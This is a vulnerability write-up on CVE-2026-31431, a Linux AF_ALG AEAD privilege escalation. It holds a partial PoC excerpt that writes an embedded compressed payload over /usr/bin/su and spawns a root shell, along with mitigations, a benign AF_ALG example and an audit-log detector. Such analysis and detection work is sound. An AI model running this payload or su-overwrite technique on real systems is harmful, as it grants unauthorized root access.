Linux Privilege Escalation | AF_ALG Crypto Abuse: Exploiting AEAD socket handling (CVE-2026-31431) to gain root via kernel-level manipulation
Overview
CVE-2026-31431 is a Linux local privilege escalation vulnerability in the kernel's AF_ALG interface (the user-space entry point to the kernel crypto API). By crafting interactions with an AEAD (Authenticated Encryption with Associated Data) socket, an unprivileged local user can escalate privileges and execute code as root.
The vulnerability stems from improper handling of cryptographic socket operations. In the PoC below, that flaw gives the attacker controlled writes into memory an unprivileged user should not be able to modify; the writes replace the contents of /usr/bin/su, and running su afterwards yields a root shell.
Impact
- Local privilege escalation
- Root shell access (via /usr/bin/su)
- Affects systems running a vulnerable kernel crypto (AF_ALG) implementation
Technical Breakdown
The exploit:
- Creates an AF_ALG socket: socket(AF_ALG, SOCK_SEQPACKET, 0), which shows up in traces as socket(38, 5, 0)
- Binds it to the AEAD algorithm authenc(hmac(sha256),cbc(aes))
- Sends crafted parameters and data via setsockopt and sendmsg
- Triggers the unintended kernel behaviour
- Drops into a root shell via g.system("su") (in the PoC, g appears to be an alias for the os module)
Key indicators:
- socket(38, 5, 0): address family 38 is AF_ALG, socket type 5 is SOCK_SEQPACKET
- AEAD socket manipulation (bind to the "aead" type with the authenc template)
- Controlled writes of a zlib-compressed payload that is decompressed at run time
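To see what the exploit is feeding with crafted arguments, here is the legitimate version of the same call sequence (socket, bind, setsockopt, accept, sendmsg/recv) against authenc(hmac(sha256),cbc(aes)). This is an added example written for this page, not the PoC and not code from the CVE author. The key encoding follows the kernel's authenc template layout (crypto/authenc.c); every key, IV, AAD and plaintext value is constructed; and the function reports "unsupported" when AF_ALG or the algorithm is unavailable, so it runs anywhere and does real work only on a Linux kernel that exposes the interface.

```python
"""Legitimate AF_ALG AEAD round trip for authenc(hmac(sha256),cbc(aes))."""
import errno
import socket
import struct

ALG_NAME = "authenc(hmac(sha256),cbc(aes))"
TAG_LEN = 32                        # HMAC-SHA256 output used as the authentication tag (ICV)

# Constructed inputs for the demo (assumptions, not values from the page)
HMAC_KEY = bytes(range(32))
AES_KEY = bytes(range(0x10, 0x20))  # 16 bytes: AES-128
IV = bytes(range(0xA0, 0xB0))       # cbc(aes) needs a 16-byte IV
AAD = b"constructed-aad"
PLAINTEXT = b"sixteen byte msg"     # authenc adds no padding: CBC input must be a multiple of 16


def authenc_key(auth_key: bytes, enc_key: bytes) -> bytes:
    """Encode a key the way the authenc() template expects it:
    struct rtattr {u16 rta_len; u16 rta_type} with rta_type CRYPTO_AUTHENC_KEYA_PARAM (1),
    struct crypto_authenc_key_param {__be32 enckeylen}, then the auth key, then the enc key."""
    rta = struct.pack("=HH", 8, 1)              # rta_len = RTA_LENGTH(4) = 8, native byte order
    param = struct.pack(">I", len(enc_key))     # enckeylen is big-endian
    return rta + param + auth_key + enc_key


def kernel_authenc_roundtrip() -> dict:
    """Encrypt, decrypt and tamper-check through the kernel AEAD socket.

    Returns {"status": "unsupported", ...} when AF_ALG or the algorithm is not
    available here; otherwise the outcome of the three operations."""
    try:
        tfm = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)   # socket(38, 5, 0)
    except (AttributeError, OSError) as exc:
        return {"status": "unsupported", "reason": repr(exc)}
    try:
        tfm.bind(("aead", ALG_NAME))
        tfm.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, authenc_key(HMAC_KEY, AES_KEY))
        tfm.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, TAG_LEN)
        op = tfm.accept()[0]          # the operation socket; key and authsize must be set first
    except OSError as exc:
        tfm.close()
        return {"status": "unsupported", "reason": repr(exc)}

    with tfm, op:
        # Encrypt: input is AAD || plaintext, output is AAD || ciphertext || tag
        op.sendmsg_afalg([AAD + PLAINTEXT], op=socket.ALG_OP_ENCRYPT,
                         iv=IV, assoclen=len(AAD))
        out = op.recv(len(AAD) + len(PLAINTEXT) + TAG_LEN)
        ciphertext, tag = out[len(AAD):-TAG_LEN], out[-TAG_LEN:]

        # Decrypt: input is AAD || ciphertext || tag, output is AAD || plaintext
        op.sendmsg_afalg([AAD + ciphertext + tag], op=socket.ALG_OP_DECRYPT,
                         iv=IV, assoclen=len(AAD))
        dec = op.recv(len(AAD) + len(PLAINTEXT))
        roundtrip = dec[len(AAD):] == PLAINTEXT

        # Tamper: flip one bit of the tag; the kernel must reject it with EBADMSG
        bad_tag = bytes([tag[0] ^ 0x01]) + tag[1:]
        try:
            op.sendmsg_afalg([AAD + ciphertext + bad_tag], op=socket.ALG_OP_DECRYPT,
                             iv=IV, assoclen=len(AAD))
            op.recv(len(AAD) + len(PLAINTEXT))
            tamper_detected = False
        except OSError as exc:
            tamper_detected = exc.errno == errno.EBADMSG

    return {"status": "ok", "ciphertext": ciphertext.hex(), "tag": tag.hex(),
            "roundtrip": roundtrip, "tamper_detected": tamper_detected}


if __name__ == "__main__":
    print(kernel_authenc_roundtrip())
```

The exploit issues these same system calls; what differs is the buffers handed to sendmsg and recv and what the kernel does with them, which the page does not detail. Two points worth noticing for analysis: the socket-level arguments (38, 5, 0) are identical for benign and malicious use, so they are a hunting signal rather than proof, and the 32-byte tag length is why the PoC's AEAD configuration is tied to hmac(sha256).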
Proof of Concept (PoC)
Also available on my GitHub: https://github.com/AdityaBhatt3010/CVE-2026-31431/
Core Payload Snippet:
Disclaimer: I do not own this PoC. It is only for educational purposes, for testing in environments where permission has been granted. The author/owner will not be responsible for any misuse.
```python
import zlib

# Excerpt from the PoC. g, d and c are helpers defined earlier in the full
# script and not reproduced here: g exposes open() and system() and appears to
# be the os module, d converts the hex string to bytes, and c(f, i, chunk)
# writes chunk at offset i of fd f. Since f is opened read-only, c cannot be a
# plain write(2); it is presumably the write primitive built on the kernel bug.
f = g.open("/usr/bin/su", 0)   # flags 0 == O_RDONLY: the target is root-owned and read-only to the user
i = 0
e = zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i < len(e):              # walk the decompressed payload in 4-byte chunks
    c(f, i, e[i:i + 4])        # write the chunk at offset i
    i += 4
g.system("su")                 # run the now-replaced su to obtain the root shell
```
Exploitation Flow
- Initialize crypto socket
- Configure AEAD parameters
- Send crafted payload
- Trigger kernel flaw
- Overwrite execution flow
- Spawn root shell
Mitigation
- Patch the kernel to a fixed version
- Restrict access to AF_ALG sockets for untrusted processes (for example with a seccomp filter on socket(AF_ALG, ...))
- Use LSM (AppArmor/SELinux) policies
- Monitor for abnormal crypto API usage, such as unprivileged processes creating AF_ALG sockets
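The key indicator above, socket(38, 5, 0), is straightforward to hunt for in Linux audit logs. The following is an added example, not from the page or the PoC repository: it parses audit SYSCALL records and flags AF_ALG socket creation, masking the SOCK_CLOEXEC/SOCK_NONBLOCK flag bits that a raw comparison of a1 against 5 would miss. The log lines are constructed, and the auditctl rule named in the comment is an assumed way of producing them.

```python
"""Flag AF_ALG socket creation in Linux audit SYSCALL records."""
import re

AF_ALG = 38                 # address family; audit prints arguments in hex, so a0=26
SOCK_SEQPACKET = 5
SOCK_TYPE_MASK = 0x0F       # a1 may also carry SOCK_CLOEXEC / SOCK_NONBLOCK flag bits

# socket(2) syscall number keyed by the audit "arch" field
SOCKET_SYSCALL = {
    "c000003e": 41,         # x86_64
    "c00000b7": 198,        # aarch64
}

# Constructed records, not real captures. Assumed producing rule:
#   auditctl -a always,exit -F arch=b64 -S socket -F a0=38 -k af_alg
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1713000000.101:501): arch=c000003e syscall=41 success=yes exit=3 a0=26 a1=5 a2=0 a3=0 items=0 ppid=4000 pid=4001 auid=1000 uid=1000 gid=1000 euid=1000 comm="python3" exe="/usr/bin/python3.11" key="af_alg"
type=PROCTITLE msg=audit(1713000000.101:501): proctitle=707974686F6E3300706F632E7079
type=SYSCALL msg=audit(1713000000.102:502): arch=c000003e syscall=41 success=yes exit=4 a0=2 a1=1 a2=6 a3=0 items=0 ppid=1 pid=4050 auid=4294967295 uid=0 gid=0 euid=0 comm="sshd" exe="/usr/sbin/sshd" key=(null)
type=SYSCALL msg=audit(1713000000.103:503): arch=c000003e syscall=41 success=yes exit=5 a0=26 a1=80005 a2=0 a3=0 items=0 ppid=4100 pid=4102 auid=1001 uid=1001 gid=1001 euid=1001 comm="crypto-tool" exe="/home/dev/crypto-tool" key="af_alg"
type=SYSCALL msg=audit(1713000000.104:504): arch=c000003e syscall=257 success=yes exit=6 a0=ffffff9c a1=7ffd0 a2=0 a3=0 items=1 ppid=4000 pid=4001 auid=1000 uid=1000 gid=1000 euid=1000 comm="python3" exe="/usr/bin/python3.11" key=(null)
type=SYSCALL msg=audit(1713000000.105:505): arch=c00000b7 syscall=198 success=yes exit=3 a0=26 a1=5 a2=0 a3=0 items=0 ppid=4200 pid=4203 auid=1000 uid=1000 gid=1000 euid=1000 comm="poc" exe="/tmp/poc" key="af_alg"
"""

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_audit_record(line: str) -> dict:
    """Turn one audit record into a dict; quoted values lose their quotes."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}


def af_alg_socket_events(lines, include_root=True):
    """Return one finding per successful socket(AF_ALG, ...) call.

    Every AF_ALG socket is reported, not only SOCK_SEQPACKET ones, because hash
    and skcipher sockets share the interface; each finding records the masked
    socket type so the exploit's exact socket(38, 5, 0) shape stands out."""
    findings = []
    for line in lines:
        rec = parse_audit_record(line)
        if rec.get("type") != "SYSCALL" or rec.get("success") != "yes":
            continue
        if rec.get("syscall") != str(SOCKET_SYSCALL.get(rec.get("arch"))):
            continue
        if int(rec["a0"], 16) != AF_ALG:
            continue
        if not include_root and rec.get("uid") == "0":
            continue
        sock_type = int(rec["a1"], 16) & SOCK_TYPE_MASK
        findings.append({
            "pid": rec.get("pid"),
            "uid": rec.get("uid"),
            "comm": rec.get("comm"),
            "exe": rec.get("exe"),
            "sock_type": sock_type,
            "seqpacket": sock_type == SOCK_SEQPACKET,
            "matches_poc_shape": sock_type == SOCK_SEQPACKET and int(rec["a2"], 16) == 0,
        })
    return findings


if __name__ == "__main__":
    for event in af_alg_socket_events(SAMPLE_AUDIT_LOG.splitlines()):
        print(event)
```

AF_ALG has legitimate users, so treat a hit as a lead to triage (which binary, which user, how often) rather than as a verdict; the value of the rule is that on most hosts unprivileged processes creating AEAD sockets is rare enough to review by hand.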